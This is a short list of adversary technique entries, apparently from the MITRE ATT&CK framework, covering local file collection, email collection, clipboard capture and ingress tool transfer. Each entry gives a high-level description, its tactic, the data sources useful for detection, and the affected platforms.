Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre